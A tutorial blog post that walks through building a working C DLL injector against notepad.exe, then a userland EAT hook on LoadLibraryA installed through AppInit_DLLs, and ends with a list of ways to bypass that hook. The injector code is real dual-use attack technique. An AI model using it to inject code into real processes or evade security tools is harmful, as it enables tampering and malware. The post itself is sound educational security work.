DLL injection & userland EAT hooking

Introduction

Our scenario

In this post, my goal is to explore two techniques used in malware development and antivirus software: DLL injection and API hooking. To do this, we are going to invent a scenario where we’ll play both the attacker and the defender. For our case study, we are going to assume that notepad.exe is a highly sensitive program. We will first attack it and, once our PoC is working, switch to the defense and try to mitigate our own attack.

The attack will consist of a simple DLL injection that just opens a basic MessageBox as a proof of concept. We will get to the defense part later but, as you may have guessed, we will play with API hooking.

Playing the attacker

What is DLL injection ?

A DLL (Dynamic Link Library) is just a way for developers to share code between applications; it’s a fancy name for a compiled library. For example, if a process wants to open a message box on the user’s screen, it will need to call MessageBoxW, which is provided by the Windows API in the user32.dll file.

The core concept of DLL injection resides in the fact that loading a DLL is performed at runtime when requested by the process (the DLL is not compiled with the standalone executable). This allows the developer to have better control of memory management since the loaded DLL can be freed at any time, but it will allow us (attackers) to also inject our own custom DLL.

Once our DLL injection is successful, the DLL is loaded into the process memory space and is executed in a newly created thread. The goal behind a DLL injection varies a lot. It can be:

Modifying the behavior of the process itself (game hacking for example)
Lateral movement (moving from a process to another)
Evading some kind of heuristic detection (It’s less suspicious if we download stuff from firefox.exe than from my_cool_malware.exe)

Note: We will only be talking about DLL injection here, but it is good to know that other DLL-related exploitation techniques exist, like DLL hijacking, hollowing etc…

Note 2: Obviously, you cannot perform a DLL injection on a process you don’t have permission to access; you can’t just privesc like that.

The DLL

As said in the introduction, our “malicious” payload is pretty straightforward, we are simply going to spawn a message box from the notepad process. Here’s the code we’re going to use:

#include <Windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD dwReasonForCall, LPVOID lpReserved) {
	if (dwReasonForCall == DLL_PROCESS_ATTACH) {
		MessageBoxW(NULL, L"Hello from notepad!", L"Evil payload", MB_OK);
	}

	// DllMain must return TRUE, otherwise the load is reported as failed
	return TRUE;
}

Note: This is just to pop a message box, I’m not going to explain exactly all the keywords used (APIENTRY DllMain and stuff), so I’m just gonna do like the cool kids: It’s left as an exercise for the reader

The Injector

Now for the real coding, our injector.

We are going to use the simplest way to inject a DLL, which is also the one most tutorials on the internet use:

Get access to the target process to interact with it
Write the DLL path into the process memory
Call LoadLibraryA from the process space, with the DLL path as parameter

Note : There are many methods to inject a DLL into a process, but for simplicity we will use this one. It works well and is not overly complicated to understand

The first step is to get access to the process we want to target:

#include <Windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, const char* argv[]) {
	if (argc != 2) {
		printf("Usage: %s <target PID>\n", argv[0]);
		return EXIT_FAILURE;
	}

	DWORD PID = (DWORD)atoi(argv[1]);

	printf("[*] - Getting handle for PID : %lu...\n", PID);
	HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD, FALSE, PID);

	// OpenProcess returns NULL on failure (not INVALID_HANDLE_VALUE)
	if (hProcess == NULL) {
		printf("[!] - Fatal error: Can't get handle of process %lu. (Is the PID valid ?).\nError code: %lu\n", PID, GetLastError());
		return EXIT_FAILURE;
	}

	printf("[*] - Success\n");
}

To get access to the process and interact with it, we need to ask the Windows API for a handle with some access rights. There are a lot of them, for example PROCESS_ALL_ACCESS, which grants everything, but here we are only using three.

We simply want to be able to write into the virtual memory (VM_OPERATION + VM_WRITE) and to create remote threads (CREATE_THREAD). Note that the CreateRemoteThread documentation also lists PROCESS_QUERY_INFORMATION and PROCESS_VM_READ as required; the three flags above were enough for this PoC, but add those two if the call fails on your system.

Once our handle is retrieved, we are going to write the path of our DLL inside the process memory.

It may seem a bit odd, but LoadLibraryA will run inside the target process, so its parameter (the path to our evil DLL) has to live in the target’s memory too.

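const char* dllPath = "C:\\Path\\To\\Your\\dll\\dll_file.dll";
SIZE_T dllPathSize = strlen(dllPath) + 1; // include the terminating NUL byte
SIZE_T bytesWritten = 0;

LPVOID addressDllPath = VirtualAllocEx(hProcess, NULL, dllPathSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (addressDllPath == NULL) {
	printf("[!] - Fatal error: Can't allocate memory in the target.\nError code: %lu\n", GetLastError());
	return EXIT_FAILURE;
}

WriteProcessMemory(hProcess, addressDllPath, dllPath, dllPathSize, &bytesWritten);
printf("[*] - Wrote %llu bytes @ 0x%llx\n", (unsigned long long)bytesWritten, (unsigned long long)(uintptr_t)addressDllPath);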

Note: You can improve this snippet of code by adding checks to ensure that everything works

In order to be able to write to the memory without corrupting some potentially critical data in the target process, we are going to use VirtualAllocEx in order to allocate a new page of memory to make some room for the parameter.

If we look at the definition of VirtualAllocEx in the Microsoft documentation, we see the following parameters:

LPVOID VirtualAllocEx(
  [in]           HANDLE hProcess,
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
);

One interesting thing I came across is the behaviour of dwSize. If we read the doc instead of just assuming that it will allocate dwSize bytes, we see that this is not quite the actual behaviour:

If lpAddress is NULL, the function rounds dwSize up to the next page boundary.

This means that when we ask to allocate strlen(dllPath) bytes, the kernel actually rounds this up to the next page boundary, usually 4 KiB (= 4096 bytes, so room for 4096 characters !). So even if we put a 1 instead of strlen(dllPath), we would get the exact same allocation size. (There’s no conclusion on that or anything, I just find it interesting.)

And the WriteProcessMemory function is pretty self explanatory.

If we now run our program, we’ll see the address where our DLL path has been written:

PS C:\Users\gamray\Documents\Development\Test\Dll_injector> .\main.exe 7356
[*] - Getting handle for PID : 7356...
[*] - Success
[*] - Wrote 68 bytes @ 0x15920000

By attaching to notepad.exe with WinDbg, we can see that our payload is indeed at that address:

The final step is now to create a remote thread calling LoadLibraryA with this path as parameter:

HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("kernel32"), "LoadLibraryA"), addressDllPath, 0, NULL);

// CreateRemoteThread returns NULL on failure
if (hThread == NULL) {
	printf("[!] - Fatal error: Can't create remote thread.\nError code: %lu\n", GetLastError());
	return EXIT_FAILURE;
}

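We use GetProcAddress to resolve the address of the function exported by kernel32 under the symbol “LoadLibraryA”. We resolve it in our own process, but the address is also valid in notepad.exe because kernel32.dll is normally mapped at the same base address in every process for a given boot session. (We need to cast it to LPTHREAD_START_ROUTINE because… well, Windows wants it like that.)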

The last thing we can do is to clean up our mess, so the program won’t crash or have unexpected behavior.

For this, we simply need to close all of our handles:

CloseHandle(hThread);
CloseHandle(hProcess);
printf("[*] - Remote thread started, DLL injected successfully\n");

return EXIT_SUCCESS;

And… Our DLL injector is ready ! I’m not gonna paste the entire code here to keep the post clean, but you can find the entire source code here (it’s a bit cleaner)

The attack

After running the attack, here’s what we got:

We successfully injected our (very) malicious DLL !

Playing the defender

What is API hooking ?

The term “hooking” refers to the act of intercepting or replacing function calls to execute our own custom code. Here, we will be hooking WINAPI functions. The goal is to alter the default behavior of an API function by adding parameter validation to it, in order to “secure” the calls and prevent the DLL injection we just performed.

Note: API hooking is not always used as a defensive mechanism, it can also be used in a malicious way, the best example being rootkits that can use API hooking to hide specific files when listing a directory.

In our scenario, we are going to hook LoadLibraryA and check its parameter to only allow “verified” DLLs (we’ll just check whether the filename is main.dll; the goal is only a technical demonstration, a real product would rely on signatures, heuristics and so on).

x86 vs x64 API hooking

There are multiple ways to hook an API. A well-known technique is “inline hooking”, used mostly on x86 systems.

The process is simple, we dynamically change the code of the target function, in order to jump to our custom hook when the function is called. Once our hook has been executed, we jump to a “trampoline”, that simply executes the stolen bytes of the original function before jumping back to it.

This whole technique relies on two facts: the “jump to our custom hook” is made with a jmp instruction which is 5 bytes long, and in most 32-bit Windows API functions, the first 5 bytes are usually the same:

mov edi, edi  
push ebp  
mov ebp, esp

Since this usually doesn’t change, it’s easy to just put those 3 instructions in a trampoline function and execute them before jumping back to the original function.

However (!), on an x64 system, the prologue does not always start with the same bytes, and the payload that jumps to our hook is bigger because addresses are 8 bytes long. This makes inline hooking more cumbersome to implement by hand.

There are two other techniques, arguably better and more practical: IAT hooking and EAT hooking. They both work, but we’ll use the EAT one for this proof of concept.

When a process loads a DLL into its memory, the Export Address Table (EAT) of the DLL is used to resolve the addresses of the functions the process imports from it. The EAT is also used to resolve functions at runtime that were not imported, for example when you call GetProcAddress(dllModule, "functionName"): since "functionName" is not imported by the process, its address is looked up in the EAT.

But what is the IAT then ? Once the address of an imported function has been resolved through the EAT, it is saved in the Import Address Table (IAT) of the importing module to avoid resolving it again on every call.

To resolve addresses, the EAT uses 3 lists:

A list of function names (the ExportNameTable)
A list of “ordinals” (the ExportNameOrdinalTable) (think of them as indexes)
A list of offsets from the DLL base (the ExportTable)

If we want to get the address of the function “TestFunction”, we search for the string in the ExportNameTable. Once we have the index of the symbol in this table, we retrieve the ordinal at the same index in the ExportNameOrdinalTable, and then we use this ordinal as an index in the ExportTable to get the offset to the function. The complete address of the function will be: dllBase + ExportTable[ordinal].

Here’s a pseudo-code example of how it works:

ExportTable            = [0x200, 0x100, 0x500];
ExportNameTable        = ["func_A", "func_B", "func_C"];
ExportNameOrdinalTable = [1, 0, 2];

/*
"func_A" = ordinal 1, address @ Dll_base + ExportTable[1] = Dll_base + 0x100
"func_B" = ordinal 0, address @ Dll_base + ExportTable[0] = Dll_base + 0x200
"func_C" = ordinal 2, address @ Dll_base + ExportTable[2] = Dll_base + 0x500
*/

So we have a 3-step process:

1 - manually parse the EAT
2 - find the offset to LoadLibraryA
3 - patch it so that it points to our custom function.

Here’s what we want to do (simplified) :

(before hooking)

(after hooking)

For all of this to work, we need to patch the EAT in the program that will inject the evil DLL into notepad. Since we can’t know beforehand which program will do what, we have to patch the EAT in every process, to be sure that no one can inject this very malicious main.dll. And since we need to patch stuff inside other processes, that means… that we are going to do DLL injection in order to prevent DLL injections 🤯.

You’ll see later how we are going to do such a thing while staying in userland and not doing any kernel related stuff. (spoiler: we are going to have to cheat a bit 😬)

Note: For the following part, it is recommended to have a little knowledge of the PE format. You can refer to this little documentation I made about the PE format if you don’t understand some of the PE structures.

1 - Parsing the EAT

current process = The process our DLL is currently loaded in

victim process = The process we want to secure from dll injection (here should be notepad.exe)

Our EAT_hook.dll needs to patch LoadLibraryA. To do this, we are going to patch the EAT of kernel32.dll (where LoadLibraryA is exported) as it is loaded in the current process memory.

Here’s some code:

uintptr_t baseAddressKernel32 = (uintptr_t)GetModuleHandleA("kernel32");

// Creating the chain to retrieve the EAT from the base address
// dos header -> nt headers -> optional header -> data directories -> directory entry export
PIMAGE_DOS_HEADER                dosHeaders = (PIMAGE_DOS_HEADER)baseAddressKernel32;
PIMAGE_NT_HEADERS64               ntHeaders = (PIMAGE_NT_HEADERS64)(baseAddressKernel32 + dosHeaders->e_lfanew);
IMAGE_DATA_DIRECTORY    exportDataDirectory = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];

uintptr_t               exportDirectoryAddr = baseAddressKernel32 + exportDataDirectory.VirtualAddress;
PIMAGE_EXPORT_DIRECTORY     exportDirectory = (PIMAGE_EXPORT_DIRECTORY)exportDirectoryAddr;

printf("[i] - Base address @ 0x%llx\n", (unsigned long long)baseAddressKernel32);
printf("[i] - Export directory @ 0x%llx\n", (unsigned long long)exportDirectoryAddr);

// The three tables are stored as offsets (RVAs) from the module base
DWORD* exportNameTable    = (DWORD*)(baseAddressKernel32 + exportDirectory->AddressOfNames);
DWORD* exportAddressTable = (DWORD*)(baseAddressKernel32 + exportDirectory->AddressOfFunctions);
WORD*  exportOrdinalTable = (WORD*)(baseAddressKernel32 + exportDirectory->AddressOfNameOrdinals);

printf("[i] - Export name table    @ 0x%llx\n", (unsigned long long)(uintptr_t)exportNameTable);
printf("[i] - Export address table @ 0x%llx\n", (unsigned long long)(uintptr_t)exportAddressTable);
printf("[i] - Export ordinal table @ 0x%llx\n", (unsigned long long)(uintptr_t)exportOrdinalTable);

(Nothing really important here, we are just walking the PE headers. Again, I encourage you to check some documentation if you want to know more.)

As you can see, we go through the PE headers of the kernel32 module: we first retrieve the base address, then we make our way to exportDirectoryAddr. Once we have its address, we can get the three tables we previously discussed:

exportNameTable
exportOrdinalTable
exportAddressTable

Now that we have our three tables, we just have to loop through them and follow the name->ordinal->address rule:

char*     currName = NULL;
WORD      currOrd  = 0;
uintptr_t currAddr = 0;

for (DWORD i = 0; i < exportDirectory->NumberOfNames; i++) {
	currName = (char*)(baseAddressKernel32 + exportNameTable[i]);
	currOrd  = exportOrdinalTable[i];
	currAddr = (uintptr_t)(baseAddressKernel32 + exportAddressTable[currOrd]);

	printf("[i] export %lu/%lu: %s @ 0x%llx\n", i, exportDirectory->NumberOfNames, currName, (unsigned long long)currAddr);
}

And this gives us:

We can even manually check the address of LoadLibraryA:

That’s our next target 😎

2 - Find the address

Welp, we just did that by hand, we now do it in C:

BOOL found = FALSE;

for (DWORD i = 0; i < exportDirectory->NumberOfNames; i++) {
	currName = (char*)(baseAddressKernel32 + exportNameTable[i]);
	currOrd  = exportOrdinalTable[i];
	currAddr = (uintptr_t)(baseAddressKernel32 + exportAddressTable[currOrd]);

	// strcmp compares the whole name, not just a prefix
	if (strcmp(currName, "LoadLibraryA") == 0) {
		printf("[i] export %lu/%lu: %s offset: 0x%lx\n", i, exportDirectory->NumberOfNames, currName, exportAddressTable[currOrd]);
		found = TRUE;
		break;
	}
}

// Without this check, currOrd would silently point at the last export
if (!found) {
	return EXIT_FAILURE;
}

LPVOID ptrToExportAddress = (LPVOID)&exportAddressTable[currOrd];

ptrToExportAddress is the pointer to the entry in the EAT, so we can overwrite it later.

And… that’s it. Yeah.

(We print the offset instead of the address because that’s what is in the exportAddressTable and it’s what we want to patch)

3 - Patch it… ?

We create the hook function, that needs to have the same prototype as LoadLibraryA:

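HMODULE WINAPI HookedLoadLibraryA(LPCSTR lpLibFileName) {
	// Keep only the file name; the path may contain no backslash at all
	const char* filename = lpLibFileName ? strrchr(lpLibFileName, '\\') : NULL;
	filename = filename ? filename + 1 : lpLibFileName;

	// military grade antivirus check:
	if (filename != NULL && _stricmp(filename, "main.dll") == 0) {
		MessageBoxA(NULL, "EVIL DLL DETECTED!!!", "EAT hooked", MB_ICONWARNING);
		SetLastError(ERROR_ACCESS_DENIED);
		return NULL; // NULL is how LoadLibraryA reports a failure
	}

	// Legit DLL: forward to the real function and return its module handle
	return originalLoadLibraryA(lpLibFileName);
}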

As you can see, we call originalLoadLibraryA if it’s a legit DLL. This is pretty important to keep the API function usable by legitimate programs. I’m not showing it here, but since we just parsed the EAT and retrieved the address of the original LoadLibraryA, I simply stored this address in a function pointer so that it can be called like this. (The full C source code is linked at the end of the post anyway.)

So, now we just have to get the offset between kernel32 and HookedLoadLibraryA and put it in ptrToExportAddress, right ?

The problem is that exportAddressTable stores offsets of type DWORD, a 32-bit unsigned integer with a maximum value of 0xFFFFFFFF. And you guessed it, the distance between kernel32 and our custom function will pretty much always be larger than that (I learned the hard way…)

The solution is to ask Windows to allocate a small chunk of memory as close as possible to kernel32 and to write a single jmp <address of our function> into it. We can then make the EAT entry point to this chunk, which will redirect any call to our function.

So first we try to allocate 0x100 bytes as close as possible to the end of the kernel32 module:

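DWORD     moduleSize    = ntHeaders->OptionalHeader.SizeOfImage;
size_t    allocSize     = 0x100;
LPVOID    jumpAddress   = NULL;
// Reservations are aligned on the allocation granularity (typically 64 KiB),
// so start at the first such boundary after kernel32 and step by that amount
uintptr_t granularity   = 0x10000;
uintptr_t targetAddress = (baseAddressKernel32 + moduleSize + granularity - 1) & ~(granularity - 1);

// Give up once the offset would no longer fit in a 32-bit EAT entry
while (jumpAddress == NULL && targetAddress - baseAddressKernel32 <= 0xFFFFFFFF) {
	jumpAddress = VirtualAlloc((LPVOID)targetAddress, allocSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	targetAddress += granularity;
}

if (jumpAddress == NULL) {
	return EXIT_FAILURE;
}

DWORD offsetJmp = (DWORD)((uintptr_t)jumpAddress - baseAddressKernel32);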

moduleSize is the size of kernel32 in memory.

We check if the offset between kernel32 and our newly allocated address is in range, and if it is, we write the jump payload to it:

// Writing our jump payload to the jump address
DWORD dwOldProtect = 0;
if (VirtualProtect(jumpAddress, sizeof(jumpPayload), PAGE_EXECUTE_READWRITE, &dwOldProtect) == FALSE) {
	return EXIT_FAILURE;
}

memcpy(jumpAddress, jumpPayload, sizeof(jumpPayload));
VirtualProtect(jumpAddress, sizeof(jumpPayload), dwOldProtect, &dwOldProtect);

It’s important to try to make the safest code possible, because if it crashes, the whole current process will crash, that’s why I make a lot of checks for failures.

And now we can finally overwrite the EAT entry !

We just have to overwrite ptrToExportAddress with offsetJmp we just calculated 🥳

if (VirtualProtect(ptrToExportAddress, sizeof(offsetJmp), PAGE_EXECUTE_READWRITE, &dwOldProtect) == FALSE) {
	return EXIT_FAILURE;
}

memcpy(ptrToExportAddress, &offsetJmp, sizeof(offsetJmp));
VirtualProtect(ptrToExportAddress, sizeof(offsetJmp), dwOldProtect, &dwOldProtect);

return EXIT_SUCCESS;

Yes, that’s right EXIT_SUCCESS 😎

Installing our EAT hook

As we said at the beginning of the section, we need to inject our DLL into every new process. This is not supposed to be the focus of this article, so we won’t use kernel drivers and will stay in userland (also because I haven’t learned kernel drivers yet 😅).

To do this, we will use an insane trick I learned in this incredible blog post from cocomelonc (go read his blog, it’s insane). We’ll use AppInit_DLLs.

The AppInit_DLLs registry value makes Windows load a specified DLL into every new GUI process. GUI process here means any process that loads user32.dll. The problem is that the DLL injector we previously made is a console app and does not import user32.dll by default… So that’s why I said we are going to cheat a bit.

In order to make Windows inject our newly created antivirus DLL into the evil injector, we are going to edit its code and add a little MessageBoxA just before creating the remote thread:

DLL_injector.c

// Calling any user32 function makes the injector import user32.dll
MessageBoxA(NULL, "Ready to inject", "Ready", MB_OK);

hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("kernel32"), "LoadLibraryA"), addressDllPath, 0, NULL);

Again, I do this trick to avoid having to do an entire kernel driver, it’s just to make the technical demonstration of EAT hooking :)

Here’s the code of cocomelonc, modified a bit to fit our needs (it’s an install / uninstall exe for our “antivirus” DLL). In short, we just add the DLL to the registry value, and now every new GUI process will have EAT_hook.dll injected.

Replaying the attack

We obviously install the hook before:

We can check it’s working correctly by opening a new notepad and checking the loaded modules inside the process:

And now, we just have to try again with our DLL injector…

And… it’s a success: the DLL injector made notepad execute our own LoadLibraryA and can’t inject the evil DLL ! 🥳

Conclusion

So, obviously, this alone is not effective at all in the real world. From an attacker’s point of view, there are so many ways to bypass it:

Simply using another function than LoadLibraryA, what about LoadLibraryEx?
Directly calling NTDLL functions
Resolving the address of LoadLibraryA by hand… Like we did
(Just rename the dll to something else than main.dll 👀)

So yeah, this was not about making our protection hard to bypass, but more a technical demonstration of the continuous cat-and-mouse game between the blue side and the red side at a relatively simple level compared to real attack tactics / security.

This project taught me so much about Windows internals. I made so many mistakes while writing it and thinking about how to make the hook work, and every time I implemented something I learned how it worked and why it wasn’t working for my specific case.

I hope sharing this journey helps readers learn a thing or two about Windows internals and malware development.

Credits / Other resources

If you want to chat about this, ask me about an unclear part or just a dumb mistake I made, please reach out to me on discord gamray or twitter @GammrayW.

All source code for the project:

Go read those blogs too:

crow dll_injection

inline api hooking original schema

ired.team iat_hooking